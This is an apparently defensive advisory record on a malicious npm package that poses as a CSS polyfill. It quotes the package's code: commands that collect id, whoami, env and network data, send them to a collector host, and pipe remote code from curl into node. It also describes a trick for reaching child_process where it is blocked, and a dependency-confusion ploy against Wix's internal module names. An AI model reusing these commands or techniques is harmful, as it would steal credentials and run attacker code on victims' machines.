VDB

GCVE-110-OSM-2026-13373

GCVE-110-OSM-2026-13373
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published October 7, 2026
Published 2026-10-06 07:29 UTC as a "CSS polyfill utility", but the package contains no polyfill. The file thunderboltRegistry.js runs automatically when loaded (top-level IIFE) and: 1. Executes the system commands id, whoami, env and ifconfig/ip addr through child_process.execSync and sends each output, together with the machine hostname, to a collector at https://orj3tao0ic8oj24h9njymexmtdz5ztphe.oastify.com/ (lines 11-41). The env step leaks every environment variable of the host, including any tokens or cloud credentials. 2. Runs curl -L https://appsecc.com/js | node, i.e. downloads and executes remote code, and reports the result as cmd=reverse-shell (line 45). 3. Sends a beacon tagged rce-poc with the Node version, platform and process id (line 52). 4. Exports fake copies of Wix-internal registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry, ...), and registry-manifest.min.json points to static.parastorage.com (Wix CDN): a dependency-confusion attempt against that organization's internal packages. index.js is empty (module.exports = {}). It obtains child_process via require("child_process"), require("node:child_process") and, if both fail, a fresh Module instance, to evade environments that block the module. Same campaign as css-eqxcdx-polyfill (already in this database): same facade and behavior, different package name and collector host. Tarball shasum 9e700b2c0520fc6a236e4b14db5db5c89b6e8ea4. Not listed in OSV/GHSA at the time of this report. thunderboltRegistry.js, top-level IIFE, runs on require: - Line 11: var wh = "https://orj3tao0ic8oj24h9njymexmtdz5ztphe.oastify.com/"; line 13: site = require("os").hostname(); line 15: fetch(wh + "?" + params + "&site=" + encodeURIComponent(site)) - Lines 18-21: obtains child_process via require("child_process"), require("node:child_process"), or a new Module instance (module.constructor) if both are blocked - Lines 25-41: cp.execSync("id"), cp.execSync("id -un || whoami"), cp.execSync("env"), cp.execSync("ifconfig || ip addr"); each output is sent as cmd=id, cmd=whoami, cmd=env, cmd=ifconfig - Line 45: cp.execSync("curl -L https://appsecc.com/js | node"); result sent as cmd=reverse-shell - Line 52: beacon=rce-poc&node=<process.version>&platform=<process.platform>&pid=<pid> - Lines 56-90: Proxy objects exported under Wix-internal module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry); registry-manifest.min.json maps these names to static.parastorage.com URLs index.js: module.exports = {} (empty). Tarball shasum 9e700b2c0520fc6a236e4b14db5db5c89b6e8ea4.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowncss-jptvix-polyfillall (affected)—

References

vendor

Browse GCVE Records

3,310 records in the GCVE database · Updated October 7, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›